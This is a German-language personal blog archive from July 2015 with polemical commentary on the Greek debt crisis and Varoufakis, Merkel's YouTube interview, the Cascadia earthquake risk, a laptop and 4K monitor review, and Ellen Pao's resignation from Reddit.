Da gibt es jetzt ein Update. Und zwar verklagt die Frau jetzt Google, Youtube, TGI Friday's (eine Restaurantkette, die aus dem Video eine Parodie/Werbevideo gemacht hatte) auf eine halbe Million Dollar Schadensersatz. Und natürlich die beiden Macher des Videos, und die NGO dahinter. Begründung:
The two, along with co-defendants Google, You Tube and TGI Friday’s, were accused of failure to get Roberts’ signed permission to air the video before they used it to sell advertising.
Da kann man sich jetzt drüber kaputtlachen, dass die so doof waren, sich nicht die Erlaubnis schriftlich geben zu lassen. Aber ich glaube ja, dass da um noch was anderes geht. Das klingt für mich so, als hätten die ihr gegenüber einen auf Rehaugen und "mittellose wohltätige non-profit Menschenrechts-NGO" gemacht, und sie dazu gekriegt, da für ein Video pro bono mitzumachen, und dann blenden sie aber Werbung ein und bereichern sich daran. Und wenn das so ist, dann kann ich nur sagen: Gut so, weitermachen! Verklag die alle, bis sie blau anlaufen! Google und Youtube hätte ich da jetzt nicht in die Klage aufgenommen, das ist ja sinnlos. Der Uploader trägt die Verantwortung, und das sind wohl diese beiden Leute von dieser Advocacy Group. Das finde ich schwer in Ordnung, wenn da mal jemand mit der großen Mistgabel die ganzen Pseudo-Menschenrechtsgruppen ausmistet.

Thu Jul 16 2015

[l] Au weia. Ich habe gerade eine Mail von einer Technikphilosophin gekriegt. Ich soll mal aufhören, die Technikphilosophie in den Dreck zu treten, nur weil "dieser eine Pseudophilosoph Unsinn erzählt".
Ich muss an der Stelle gestehen, dass mir nicht bewusst war, dass es einen Fachbereich "Technikphilosophie" gibt, von Leuten, die sich selbst als Technikphilosophen bezeichnen. Ich kannte das vor dieser Mail nur von der Selbstbezeichnung von Sandro. Ich dachte, das ist etwas, das man nachträglich als Bezeichnung für Leute genommen hat, die Sci-Fi gemacht haben, bevor es Sci-Fi hieß.
Daher an dieser Stelle eine aufrichtige Entschuldigung an die Technikphilosophie als Fachbereich. Nur weil ich meinen alten Bekannten Sandro immer wieder gerne damit aufzuziehen versuche, heißt das nicht, dass ich da pauschal einen Fachbereich beschmutzen wollte. Ich wollte ja nicht mal Sandro beschmutzen, nur ein bisschen Häme über ihm ausgießen, weil er da mit diesem Artikel so ins Klo gegriffen hat.
Also, liebe Technikphilosophen. Ich bitte um Entschuldigung. War nicht persönlich gemeint. Nichts für ungut. Weitermachen!
(Aber bitte darauf achten, dass Aussagen Hand und Fuß haben)
Übrigens, bei der Gelegenheit passt das vielleicht. Ich möchte auch den Geisteswissenschaften versichern, dass ich nichts gegen Philosophie habe. Im Gegenteil. Es wird viel zu wenig philosophiert. Was mich nervt sind so Schmalspur-Pseudowissenschaft und Leute, die sich zu ernst nehmen. Beides gibt es in den Naturwissenschaften selbstverständlich auch in viel zu hoher Zahl. Aus meiner Sicht sind die Geisteswissenschaften da viel zu sehr in der Defensive. Nicht rumheulen, was tun! Diese Bunkermentalität finde ich furchtbar. "Immer hacken die Leute auf uns rum!1!!" Na wenn ihr darauf nur mit Rumheulen reagiert, dann ist da möglicherweise was dran! Los, forscht mal was cooles. Macht euch mal ein paar bahnbrechende Gedanken! Aber den Anspruch solltet ihr dann schon haben. Dass die bahnbrechend sind.
[l] Liebe Leser, normalerweise bemerkt man Erdbeben ja. Der Boden bebt, die Wände wackeln. Aber vorgestern gab es eines, das hat kaum jemand bemerkt.
Der Weltwährungsfonds hat angesagt, dass sie nicht bei der Griechenland-Rettung mitmachen, wenn das nur so halbgare Merkel-Scheiße ist. Sie sagen, Griechenland braucht sowas wie 30 Jahre Stundung auf ihre Schulden, damit sie überhaupt eine Chance haben, ihre Wirtschaft soweit repariert zu kriegen.
The findings are explosive. The document amounts to a warning that the IMF will not take part in any EMU-led rescue package for Greece unless Germany and the EMU creditor powers finally agree to sweeping debt relief.
Der Weltwährungsfonds ist bisher nicht dadurch aufgefallen, Ländern tatsächlich langfristig helfen zu wollen. Im Gegenteil. Bisher war deren Rolle, Länder langfristig unten zu halten, damit der Hegemonieanspruch der G8 nicht in Gefahr gerät.
Was das zu einem Erdbeben macht, ist dass Deutschland die ganze Zeit schon darauf beharrt, dass es ohne den Weltwährungsfonds keinen Deal geben wird. Aber gleichzeitig ist Deutschland auch vehement gegen einen Schuldenschnitt.
Und was ist der größte Hammer an der Geschichte? Festhalten!
The creditors were aware of the IMF’s report as early as Sunday, yet chose to sweep it under rug. Extracts were leaked to Reuters on Tuesday, forcing the matter into the open.
Ah ja, die gute alte Merkel-Kopf-in-den-Sand-Technik!
Der Weltwährungsfonds hat noch eine andere ziemlich offensichtliche Beobachtung gemacht:
The IMF said there is no conceivable chance that Greece will be able to tap private capital markets in the foreseeable future, leaving the country entirely dependent on rescue funding.
Oh und die Schuld an der Eskalation geben sie dem Runterfahren der griechischen Banken, was Varoufakis ja als finanziellen Terrorismus bezeichnet hatte.
The decision by the European Central Bank to force the closure of the Greek banks two weeks ago by freezing emergency liquidity assistance (ELA), appears to have cost European taxpayers very large sums of money.
NEIN! DOCH!! OOOOH!!!!
Aber kommen wir zum Money Quote des ganzen Artikels:
The IMF said the Europeans will either have to offer a “deep upfront haircut” or slash the debt burden by stretching maturities and presumably by lowering interest costs.
Schöne Grüße von Captain Obvious!
Oh, warte, einen hab ich noch:
Debt forgiveness alone would not be enough. There would also have to be “new assistance”, and perhaps “explicit annual transfers to the Greek budget”.
Eine Transferunion! Das machen die USA auch. Und Deutschland macht es auch mit den Bundesländern. Das werden wir auch auf EU-Ebene machen müssen, denn anders geht eine Währungsunion nicht. (Danke, Alexander)

Wed Jul 15 2015

[l] Habt ihr das mitgekriegt, wie dieser eine Youtuber zur Kanzlerin durfte, und ihr ein paar belanglose Fragen seiner attraktiven Hörerdemografie weiterleiten durfte? Ging tagelang durch die Medien. Jetzt ist es vorbei, und jetzt zerreißen sich die Medien das Maul, wie schlecht das war. Der Mann hat ja gar kein Contra gegeben!1!!
Ja, äh, als ob irgendeiner dieser ganzen austauschbaren Currywurstjournalisten im Lande der Kanzlerin in Interviews Contra geben würde! Wer Contra gibt, kriegt nie wieder ein Interview, so einfach ist das. Das haben ein-zwei Mal Leute in Ansätzen probiert, und dann niemand mehr. Und die Merkel ist ja eh kein spannender Interviewgast. Der stellt man eine Frage, und sie labert einfach irgendwelche inkohärenten, in keiner Beziehung zur Frage stehenden Sprechblasen runter. Da kann ich aus einem Interview mit meinem Schreibtisch mehr Erkenntnisgewinn ziehen!
Was wollen die jetzt also alle von diesem Youtuber? In meinen Augen ist das eine Kombination aus nach unten treten und purem Neid. Durch auf dem Typen rumtrampeln, und möglichst laut und zentral und öffentlich die Frage stellen, ob man den eigentlich überhaupt als Journalisten zählen darf, kann man klarstellen, dass man selbst etwas besseres ist. Der Typ ist Youtuber mit gelangweilten Kindern als Zielgruppe, ich bin ausgebildeter Journalist!1!! Und der Neid kommt daher, dass der eine Chance hatte, mal was anders und besser zu machen. Gut, nicht wirklich, denn mit der Merkel kann man zwar reden, und Merkel redet dann zurück, aber ein Dialog kommt nicht zustande. Kann man sich auch sparen. Da könnte man auch die schwedische Nationalhymne singen. Aber der kam überhaupt mal in die Nähe von der Merkel. Wie viele von diesen ganzen Käsestullen-Journalisten kann das von sich behaupten? Von den ganzen ausgebildeten Spezialjournalisten? Na? Wie viele von denen saßen mal mit einer Kamera mit der Merkel in einem Raum und konnten Fragen stellen? Und alle anderen Journalisten haben zugeguckt? Na? Ich sag's euch. Keiner.
Alles in allem stößt mich die Gesamtsituation ab. Merkel hat gemacht, was sie immer macht. Dieser Typ hat gemacht, was von ihm erwartet wurde (und zwar auch von der Merkel! Glaubt doch gar nicht, die hätte das geschehen lassen, wenn da harte Fragen gekommen wären!). Und die Journalisten machen jetzt aus niedrigsten Instinkten heraus diesen Typen da platt. Denn gemeinsam kommen sie grob knapp über die Wirkmächtigkeit dieses einen Youtube-Typen. Gerade so. Und das nutzen sie, um da mal gemeinsam draufzutrampeln. Eine Schande für alle Beteiligten. Außer diesem Youtuber, finde ich. Alles, was der besser hätte machen können, ist das abzulehnen. Oder es anzunehmen und die dann am langen Arm verhungern zu lassen, wie Deutschland es gerade mit Griechenland macht. Sorry, musste verschoben werden, hatte gerade wichtigeres zu tun. Bier war alle. Sowas.
Ich habe mir die Frage noch nie gestellt, was ich tun würde, wenn mir morgen die Merkel ein Interview im Kanzleramt anböte. Ich vermute, dass in so einer Situation so gut wie niemand ablehnen würde. Man lügt sich dann was vor, dass man ja nichts zu verlieren und nur zu gewinnen hat, und vielleicht kann man ein-zwei fiese Fragen absetzen. Und dann geht man hin, und sitzt einer Frau gegenüber, die seit 20 Jahren nichts anderes macht, als Fragen zu ignorieren und keine politische Position zu bekleiden, bis alle Optionen bis auf eine ausgeschieden sind, und dann was von "das ist unsere einzige Wahl" und "alternativlos" zu faseln. Wieviel Hybris braucht man eigentlich, um sich zu denken, man habe da eine Chance, irgendwas zu verbessern?
Daher, aus meiner Sicht, sollten hier alle mal gepflegt die Schnauze halten in der Angelegenheit. Niemand hat sich mit Ruhm bekleckert.
Und im Übrigen ist doch eine Sache völlig klar geworden. Leute vom Jahrgang von diesem Youtuber und seinen Abonnenten betrachten Politik aus dem Hause Merkel wie sie Fotos von Pluto betrachten. Wie Relikte aus einem fernen Teil des Kosmos. Glückwunsch, Frau Merkel. Sie haben eine ganze Generation an Menschen verloren. Ach was sage ich verloren. Verscheucht!
Update: Zum Vergleich: 1994 hat Merkel (damals Jugendministerin) Campino ein Interview gegeben.
[l] Was sagen eigentlich die Euro-Architekten, wenn man sie auf das Griechenland-Problem anspricht? Dieser hier schlägt vor, dass Griechenland einfach zwei Währungen hat. Euro und Drachme oder so. Und dann kann sich jeder aussuchen, was er nimmt!1!!
Tolle Idee! Dann hätte man die Nachteile von beiden! Externe Schulden wären in Euro, und interne Abwertung der Drachme bringt nicht viel, muss daher also in höheren Dosen gemacht werden. Ja super!
[l] Noch ein längeres Interview mit Varoufakis über die fünf Monate im Amt. Die Details sind ungefähr so, wie man sich das vorstellt. Money Quote:
HL: You’ve said creditors objected to you because “I try and talk economics in the Eurogroup, which nobody does.” What happened when you did?
YV: It’s not that it didn’t go down well – it’s that there was point blank refusal to engage in economic arguments. Point blank. … You put forward an argument that you’ve really worked on – to make sure it’s logically coherent – and you’re just faced with blank stares. It is as if you haven’t spoken. What you say is independent of what they say. You might as well have sung the Swedish national anthem – you’d have got the same reply. And that’s startling, for somebody who’s used to academic debate. … The other side always engages. Well there was no engagement at all. It was not even annoyance, it was as if one had not spoken.
Die Erfahrung habe ich auch gemacht. Mit der Politik reden ist wie mit einer Wand reden. Die sondern ein paar Sprechblasen ab, zu denen ihnen ihr PR-Fuzzy geraten hat, und denken sich: Wieder zwei Wählerstimmen gewonnen!1!!
Besonders geil ist wie sich Schäuble verhalten hat:
[But] Schäuble was consistent throughout. His view was “I’m not discussing the programme – this was accepted by the previous government and we can’t possibly allow an election to change anything. Because we have elections all the time, there are 19 of us, if every time there was an election and something changed, the contracts between us wouldn’t mean anything.”
Er erklärt auch, wieso sie unter solchen Umständen überhaupt diskutiert haben (wir hatten ein Mandat, wir sind gewählt worden, um zu verhandeln) und wieso sich das so lange hingezogen hat:
The negotiations took ages, because the other side was refusing to negotiate. They insisted on a “comprehensive agreement”, which meant they wanted to talk about everything. My interpretation is that when you want to talk about everything, you don’t want to talk about anything.
Glasklar erkannt!
Als nächstes beschreibt er die Strategie der EU in den "Verhandlungen". Die EU sagt: Wir brauchen alle eure Daten über euren Weg gerade, was ist der Status, wo geht es hin. Dann braucht die griechische Regierung einen Monat oder so, um das alles zusammenzutragen, und sie treffen sich wieder. Und dann passiert das hier:
The second phase was where they’d ask us what we intended to do on VAT. They would then reject our proposal but wouldn’t come up with a proposal of their own. And then, before we would get a chance to agree on VAT with them, they would shift to another issue, like privatisation. They would ask what we want to do about privatisation, we put something forward, they would reject it. Then they’d move onto another topic, like pensions, from there to product markets, from there to labour relations, from labour relations to all sorts of things right? So it was like a cat chasing its own tail.
Mit anderen Worten: Die haben auf Zeit gespielt. Sie wussten genau, dass sie die Griechen am langen Arm verhungern lassen können. Und dass während der Verhandlungen das Elend in Griechenland nur immer noch schlimmer würde. Also haben sie den Griechen was für den Zeitvertreib gegeben, und dafür gesorgt, dass das völlig klar wird, dass das bloß Zeitvertreib war, und man nicht gewillt ist, sich auch nur die Positionen der Griechen zuende anzuhören, geschweige denn zu einem Kompromiss zu kommen.
So ungefähr stelle ich mir das auch vor, wenn Israel und Palästina über den "Friedensprozess" verhandeln.
Ich bin ja ehrlich gesagt überrascht, wie konkret sich die Syriza-Leute da eine Strategie zurecht gelegt hatten. Nicht für die Verhandlungen, so ala Spieltheorie, sondern wie man aus der Krise rauskommen kann. Die haben es wirklich versucht! Das war mehr als "wir stellen uns jetzt tot und unterschreiben alles". Eine Schande, dass Deutschland die so ausgebremst und vor die Wand hat fahren lassen.
So by the time the liquidity almost ran out completely, and we were in default, or quasi-default, to the IMF, they introduced their proposals, which were absolutely impossible… totally non-viable and toxic. So they delayed and then came up with the kind of proposal you present to another side when you don’t want an agreement.
Ja warum denn auch. In Europa gilt jetzt wieder das Faustrecht. Der Stärkere diktiert die Konditionen für die Kapitulation. Das ist eine bewährte Strategie. Da werden sich einige ältere Mitbürger in unseren Nachbarländern sicher noch gut dran erinnern können.
Ich fürchte ja fast, dass wir mal wieder einen Krieg verlieren müssen. Muss ja kein Krieg mit Panzern und Haubitzen sein. Ein Wirtschaftskrieg reicht ja. Aber verlieren müssen wir, und zwar ordentlich, wenn wir so mit unseren Nachbarn umspringen. So geht man nicht mit Schuldnern um, wenn man sein Geld wiedersehen will und Kunden behalten will. So geht man mit Schuldnern um, wenn man sie langsam ausbluten will mit Zins und Zinseszins, und sicherstellen will, dass sie nie aus ihrer Notlage rauskommen. Nicht mal unseren Banken erlauben wir so ein Verhalten.
Oh und noch eine wichtige Lektion kann man hier lernen. Kapitalismus basiert darauf, dass die Reichen die Armen gegeneinander ausspielt. Die müssen alle neidisch aufeinander sein, die müssen sich Geschichten von Florida-Rolf erzählen und von Sozialschmarotzern, von Kindergeldbetrügern und Flüchtlings-Schmarotzern, von den bösen Diebesbanden aus Rumänien und den fiesen EU-Billiglohnländern, die unsere Arbeitsplätze klauen wollen (dabei sind wir selber jetzt ein Niedriglohnland, dank Frau Merkel). Aber keinesfalls dürfen sie darüber reden, wie ungerecht das Vermögen verteilt ist. Sonst könnte sich ja möglicherweise was ändern. Und genau so erging es Griechenland.
HL: Did you try working together with the governments of other indebted countries?
YV: The answer is no, and the reason is very simple: from the very beginning those particular countries made it abundantly clear that they were the most energetic enemies of our government, from the very beginning. And the reason of course was their greatest nightmare was our success: were we to succeed in negotiating a better deal for Greece, that would of course obliterate them politically, they would have to answer to their own people why they didn’t negotiate like we were doing.
Immer schön die Opfer gegeneinander kämpfen lassen. Bisschen Brot noch dazu, zu den Spielen. Fertig.
Update: Schuldner, nicht Gläubiger. m(

Tue Jul 14 2015

[l] Infrastrukturapokalypse: Brand und Explosionen in Trafostation in Offenburg, fette Stromausfälle in der Umgebung. Und wir haben uns damals über die Rolling Blackouts in Kalifornien unter Enron lustig gemacht, erinnert ihr euch noch? (Danke, Thorsten)
[l] Steht ihr auf Katastrophenfilme? Dann habe ich hier einen Artikel für euch. Vom San Andreas Fault hat ja so gut wie jeder schon mal was gehört, nicht zuletzt weil es da schöne Katastrophenfilme zu gibt. Aber es stellt sich raus, dass der im Vergleich zur Cascadia Subduction Zone mal eben ein-zwei Größenordnungen weniger gefährlich ist. Das ganze liest sich wie ein Krimi, aber geschrieben von jemandem mit Depressionen, der sich in allen Details ausmalt, wie schlimm das wohl werden wird. Wer auf sowas nicht steht, oder das lieber gar nicht erst hören will, der sollte das lieber nicht lesen.
Es geht los mit ein paar roten Zedern, die an Salz gestorben sind. Man nahm an, dass da eben Salzwasser langsam reinflutete, aber ein Biologe hat sich die Bäume und ihre Jahresringe näher angeguckt und herausgefunden, dass das Salzwasser da plötzlich kam. Das Problem bei dieser Subduction Zone ist, dass sich die nordamerikanische tektonische Platte über die Juan de Fuca-Platte im Ozean schiebt. Jedes Jahr wird die Küste 3-4 Millimeter hochgehoben, aber gelegentlich kommt es da halt zu einem größeren Erdbeben, bei dem die Küste wieder ins Meer fällt. Das kann an sich schon ein Problem sein, wenn man zu nah am Ufer wohnt, aber es löst eben auch einen fetten Tsunami aus. Im letzten großen Fall, den es da gab, im Jahr 1700, kam der Tsunami bis Japan, und die haben sich gewundert, weil sie das Erdbeben dazu gar nicht gespürt hatten. Fun Fact am Rande:
And nearly all the volcanoes are caused by the oceanic plates sliding deep beneath the continental ones, eventually reaching temperatures and pressures so extreme that they melt the rock above them.
Das Problem ist halt, dass diese Erkenntnis über die Subduction Zone keine 50 Jahre alt ist, und die Anforderungen an neu gebaute Häuser damit frischer sind als die meisten Häuser in der Gegend. Wenn da also echt ein fetter Tsunami einschlägt, dann ist Ende. Oder, wie da einer der Zuständigen es formuliert:
Twenty-two per cent of Oregon’s coastal population is sixty-five or older. Twenty-nine per cent of the state’s population is disabled, and that figure rises in many coastal counties. “We can’t save them,” Kevin Cupples says. “I’m not going to sugarcoat it and say, ‘Oh, yeah, we’ll go around and check on the elderly.’ No. We won’t.” Nor will anyone save the tourists. Washington State Park properties within the inundation zone see an average of seventeen thousand and twenty-nine guests a day. Madin estimates that up to a hundred and fifty thousand people visit Oregon’s beaches on summer weekends. “Most of them won’t have a clue as to how to evacuate,” he says. “And the beaches are the hardest place to evacuate from.”
Da bin ich plötzlich ausgesprochen froh, den Road Trip gemacht zu haben, als die Gegend noch existierte. Mir sind ja auch die ganzen Tsunami-Escape-Route-Schilder aufgefallen, aber ich habe mir gedacht, Tsunami? Hier? Die haben wohl zu viele Emmerich-Filme geguckt.
Die Beschreibungen in dem Artikel sind ausgesprochen explizit. Hier ist, wie sie den Tsunami beschreiben:
A grown man is knocked over by ankle-deep water moving at 6.7 miles an hour. The tsunami will be moving more than twice that fast when it arrives. Its height will vary with the contours of the coast, from twenty feet to more than a hundred feet. It will not look like a Hokusai-style wave, rising up from the surface of the sea and breaking from above. It will look like the whole ocean, elevated, overtaking land. Nor will it be made only of water—not once it reaches the shore. It will be a five-story deluge of pickup trucks and doorframes and cinder blocks and fishing boats and utility poles and everything else that once constituted the coastal towns of the Pacific Northwest.
Nur falls sich jemand dachte, ach naja, ich kann doch schwimmen, wie schlimm kann das schon sein.
Die Planungen von FEMA, der Katastrophenschutzbehörde der USA sind:
“Our operating assumption is that everything west of Interstate 5 will be toast.”

Mon Jul 13 2015

[l] Weil ein paar Leute gefragt haben.
Ich hatte vor einer Weile geschrieben, dass mein neues Notebook ein Schenker XMG P505 geworden ist. Das habe ich jetzt eine Weile im Einsatz und bin nach wie vor hochzufrieden. Die Verarbeitung überzeugt auf ganzer Linie, die verbaute Hardware war Top of the Line beim Einkauf und ist es immer noch weitgehend. Da war keine Bloatware drauf, alles ordentlich installiert, keine unerkannten Geräte im Dateimanager, ich konnte sagen, dass ich lieber ein englisches Windows zu meiner deutschen Tastatur haben will, da lagen auch keine Antivirus-Trial-Bullshit-Vorinstallieren bei, und für Gaming ist der echt prima.
Meine größte Sorge war, dass der dann fürs normale Arbeiten nicht gut sein würde, weil die Batterie nicht lange hält oder der Lüfter immer läuft. Kurz gesagt: Ist kein Ultrabook, der Akku hält gut drei Stunden beim Tippen in der Bahn. Filmgucken kann ich auf Fullscreen im Akkubetrieb für die Lände normaler Hollywoodfilme, und habe dann so 30-40% Akku übrig. Bei einem besonders langen Film (2h20) kam ich bis kurz vor den Abspann. Der Lüfter läuft normalerweise nicht. Man hört nur die Festplatte leise zuckeln, wenn man die nicht runterfährt oder gleich ganz auf SSD setzt. Ich kann gerade echt nichts sagen, was bei mir Unzufriedenheit auslöst bei dem Gerät. Ich benutze den inzwischen auch Zuhause und fahre den Desktop gar nicht mehr hoch. Der 4k-Monitor funktioniert am Mini-DP-Ausgang in 4k mit 60 Hz. Alles super.
So und jetzt der 4k-Monitor. Den habe ich jetzt ein paar Tage im Einsatz und bin auch hochzufrieden. Ich habe bisher keine Schlieren oder Latenzprobleme beobachten können, und fahre den im Moment im Eco-Modus (dunkler). Gimmicks wie Bild-in-Bild oder den Bildbearbeitungsmodus benutze ich nicht, die scheinen aber zu funktionieren. Das Hauptproblem auf einem 4k-Monitor ist, dass man da bei Software nachjustieren muss, um den HiDPI-Modus zu aktivieren. Das kann ein bisschen fummelig werden, aber ich benutze im Wesentlichen unter Linux außer urxvt und Webbrowser keine weiteren Anwendungen, gelegentlich mal einen Image Viewer vielleicht, oder einen gvim. Da setzt man halt die Font hoch, Firefox richtet sich nach der DPI-Zahl, die X leider nicht automatisch aus dem EDID holen kann, die konfiguriert man dann halt manuell mit xrandr. Fertig. Der Monitorsound funktioniert über miniDP vom Laptop aus unter Linux mit mplayer aus dem Stand und ich höre damit gerade den Mass Effect 2 Score seit ner Stunde. Klingt nicht wie so gut wie die Stereoanlage, aber gut genug, dass ich mir damit seit ner Stunde Musik anhöre. Anyway. Schenker-Gaming-Laptops würde ich sofort wieder kaufen, den Monitor nach bisherigem Stand auch. Wenn mir da nicht noch irgendwas ganz doll dreckiges auffällt.
Was mir gerade unerwartet Stress macht ist meine Logitech-G100-Maus, wo die linke Maustaste Aussetzer hat. Da kommen gelegentlich Mausklicks nicht an. Man hört den Klick, aber nichts kommt an. Sehr befremdlich, mit Logitech hatte ich eigentlich bisher nie Ärger. Vorher hatte ich zwei Mäuse von Roccat, das würde ich nicht nochmal kaufen. Die hatten beide das selbe Problem (waren verschiedene Modelle), nämlich dass die Gummischeiben links und rechts mit irgendeinem Billigkleber festgeklebt waren, der dann bei Benutzung warm und flüssig wurde und da an den Seiten rausquoll. Dann hatte ich bei der Mausbenutzung plötzlich klebrigen Schleim an den Fingern. Irgendwann habe ich dann mal genug gehabt und die Gummiplatten abgemacht, den Klebstoff entfernt, und die Platten wieder mit Bastelkleber festgemacht. Aber, sorry, bei Mäusen dieser Preisklasse ist das mal völlig inakzeptabel. Roccat kommt mir nicht wieder ins Haus. Und wenn Logitech jetzt auch nachlässt, gehen mir langsam die Optionen aus. Ich bestehe aus Privatsphäregründen auf kabelgebundenen Mäusen, hätte aber gerne eine optische Maus, die auch auf Glas funktioniert. Das konnten die Roccat-Mäuse auch nicht. Da holt man dann im Hotel auf Reisen die Maus raus und ärgert sich, dass man auch ein Mauspad hätte mitbringen müssen.
Oh, der Monitor tat bei mir in Tests sowohl an einer alten AMD-Grafikkarte im Desktop und am Laptop unter Linux. Da hatte ich mir auch ein bisschen Sorgen gemacht. War aber anstecken-tut. Musste da nichts konfigurieren. Gerade bezüglich MST und so hatte ich mir da Sorgen gemacht. War unbegründet.
Update: Ich probiere gerade Firefox mit GTK3. Damit funktioniert der automatische HiDPI-Modus von Firefox/GTK2 nicht mehr.
[l] Alle Welt fragt sich gerade, was die mit dem Tsipras gemacht haben, dass der so eingeknickt ist. Ich vermute, dass sie ihm einfach deutlich gemacht haben, dass sie unter überhaupt keinem Zeitdruck stehen, hier eine Lösung auch nur anzugehen. Griechenland zahlt ja die ganzen Verhandlungen über weiterhin seine Zinsen (bis auf die eine IWF-Tranche, die sie haben platzen lassen).
Es ist natürlich immer einfach, da jetzt "also ich hätte da ja mal richtig auf den Tisch gekotzt" zu behaupten, aber ich denke mal, wenn man Landeschef ist, und tatsächlich versucht, für seine Bevölkerung das Richtige zu machen, dann kann man die Not und das Elend in Griechenland gerade nicht einfach weiterlaufen lassen, und greift nach Strohhalmen.
Man muss ja nur mal nach Palästina gucken, um zu sehen, wie lange der ach so humanistische Westen da eine Situation immer schlimmer werden lässt, und am Ende auch noch das Wort "Friedensprozess" dranschreibt und es gegen die Palästinenser verwendet. Der Zynismus des Westens kennt da halt keine Grenzen, das kann ja jeder sehen. Und solange nur andere leiden und nicht wir, hat der Westen mit seinen ganzen westlichen Werten überhaupt keine Eile, für Besserung zu sorgen. Für diese Einsicht muss man nur mal die Zustände in Flüchtlingslagern angucken.
Ich kann mich jetzt nicht soweit bringen, zu sagen, Tsipras habe das Richtige getan. Aber am Ende des Tages muss man sich fragen, wie viel ein Sieg wert ist, wenn auf dem Weg zu dem Sieg das halbe Volk verhungert ist.
Im Übrigen, bezüglich der hässlichen Fratze der Deutschen, die in diesen "Verhandlungen" sehr schön offenbar wurden, schließe ich mich den Ausführungen von Don Alphonso an.
Und, der Vollständigkeit halber: Das ist natürlich nicht nur ein Putsch gegen die alte Bundesrepublik und ihre Werte, das ist vor allem ein Putsch gegen Griechenland. Die EU hat gerade gezeigt, wie "demokratisch" sie ist. Und was ihre "Werte" wert sind.
[l] Erinnert ihr euch an den Mann, der die Brandanschläge gegen Bundeskanzleramt und Reichstag gemacht hat? Der ist heute früh tot in seiner Zelle aufgefunden worden, twittert ein Kriminalreporter der Berliner Zeitung.
Update: Klarer Fall von Selbstmord!

Sat Jul 11 2015

[l] Die Reddit-Chefin Ellen Pao ist zurückgetreten.
Ich habe mir die ganze Nummer eigentlich sparen wollen, weil das so nach Hetzjagd aussah, und man von außen immer schlecht beurteilen kann, wer da jetzt mit Scheiße wirft und wer eine legitime Position vertritt.
Aber dann dachte ich mir: Hey, das ist unfair, zu Brandan Eich hab ich ja auch was gesagt, und da waren die Umstände ja auch irgendwie ähnlich.
Daher schreibe ich mal, wie das bei mir angekommen ist.
Erstmal: Ich wusste gar nicht, dass Ellen Pao überhaupt Chefin von Reddit ist. Alles, was ich mit ihr assoziierte, war dieses Gerichtsverfahren gegen Kleiner Perkins.
Also erstmal: Frau Pao hat hat einen Elektrotechnik-Bachelor von Princeton, einen Jura-Doktor von Harvard und einen MBA von Harvard Business School. Das ist geradezu unfassbar, denn mit so einem Feuerwerk an Ivy League-Abschlüssen sind sicher höhere sechsstellige Kosten verbunden. Das ist ein kleines Wunder, dass sich eine chinesische Frau das leisten konnte. Vielleicht kommt sie aus einer reichen Familie? Das ist jedenfalls ein außerordentlicher Privilegierten-Status, den sie da genießt.
Kleiner Perkins ist eine relativ bekannte VC-Bude. Ich habe eine eher geringe Meinung von VC-Buden, seit ich mal bei einem frühen Arbeitgeber von mir gesehen habe, wie die so operieren. Aber egal, mit Kleiner Perkins hatte ich noch nichts zu tun, ich habe die aber recht negativ eingestuft, weil mir dieses ganze Startup-Gehabe in den USA eh gewaltig auf den Sack geht. Die haben da geradezu eine Religion geschaffen, die diesen amerikanischen Self Improvement und Self Help und American Dream Kult mit der Kapitalismus-Religion zu einer neuen Sekte, dem Startup-Wahn verbindet. Kleiner Perkins ist m.W. eine der größeren VC-Buden in den USA, die haben u.a. ihre Finger bei Amazon, Citrix, Compaq, Electronic Arts, Google, Juniper, Netscape, Symantec, Verisign und Sun drin gehabt. Das ist keine kleine Klitsche, das ist ein großer Player im VC-Markt.
So, und da hat Frau Pao eines Tages angefangen, und wie in allen Sekten haben sie ihr den gleichen Bullshit erzählt, den sie auch Startups erzählen: Die Chancen betont, die Risiken nicht erwähnt. Sie dachte daher, in ein paar Jahren ist sie da Senior Partner und macht die fette Kohle. Das geschah nicht. Nun ist natürlich Diskriminierung in den USA auf dem Papier genau so verboten wie hier, daher kommen solche Entscheidungen in keiner Firma ohne einen fetten Paper Trail zustande. Bei Kleiner Perkins gab es jährliche Evaluierungen der Arbeit der Mitarbeiter durch ihre Kollegen. Und da schnitt Frau Pao halt nie gut genug ab, um befördert zu werden.
Sie hat dann irgendwann geklagt, weil sie fand, Inkompetenz sei bei ihren männlichen Mitarbeitern noch nie ein Ausschlusskriterium für eine Beförderung gewesen, und das könne nur durch sexuelle Diskriminierung zustande gekommen sein, dass sie nicht voran kommt.
Das klang für mich legitim, denn mir sind VCs bisher auch nur als Good Old Boys Clubs begegnet, und bei einer so alten und legendären Firma wie Kleiner Perkins liegt der Verdacht nahe, dass das da auch so ist. In dem Verfahren wurde dann von allen Seiten eine Menge Dreckwäsche öffentlich gewaschen, und es endete am Ende so, dass sie verloren hat. In der Statistik, stellt sich raus, ist Kleiner Perkins sogar eher vorne mit dabei in Sachen Frauenquote. Nur ob das jetzt heißt, dass die besonders gut sind, oder dass die anderen besonders steinzeitlich sind, weiß ich nicht.
Nachdem sie dann bei Kleiner Perkins rausflog, wurde sie CEO von Reddit, die zu Conde Nast gehören. Das ist eine Verlagsgruppe, die eigentlich so Sachen wie Vogue und GQ rausbringt. Aber denen gehört halt auch Reddit.
Bei Reddit war sie nur ein paar Monate, wenn ich das richtig sehe, und dann gab es eine Revolte. Eine Mitarbeiterin von Reddit, von der, so mein Eindruck, von den Usern vorher noch keiner was gehört hatte, wurde auf der Site plötzlich als in den Rücken gedolchte Heldin positioniert, ohne die da gar nichts geht. Ihre Aufgabe war, für AMAs die Gäste zu managen — Einladung, Flug buchen, Besprechen, evtl für sie tippen, sowas. Der Großteil von Reddit wird nicht von Angestellten gemanaged, sondern von Freiwilligen, und denen hatte nicht nur niemand Bescheid gesagt, es gab da auch keinen kurzfristigen Ersatz, d.h. die konnten plötzlich ihre AMA-Planung über den Haufen werfen. Ein unschöner Management-Fuckup, und wir wissen bis heute nicht, wieso diese Frau da jetzt gefeuert wurde.
Aber die Moderatoren von diversen wichtigen Subreddits haben dann plötzlich die Foren in ihrem Einflussbereich auf Privat geschaltet, woraufhin Reddit praktisch zum Erliegen kam. Es gab einen riesigen Shitstorm, und — wenn man den Berichten auf Reddit selber glauben darf — das Management reagierte beschissenstmöglich. Der eine Gründer von Reddit postete einen dämlichen Kommentar über Popcorn, und als dann irgendein Schwachmat eine Online-Petition gemacht hat, die den Rücktritt von Ellen Pao forderte, die nach einer Nacht schon über 70000 Unterschriften hatte, hat Ellen Pao angeblich zu Protokoll gegeben, das sei ihr wurscht ("not fazed").
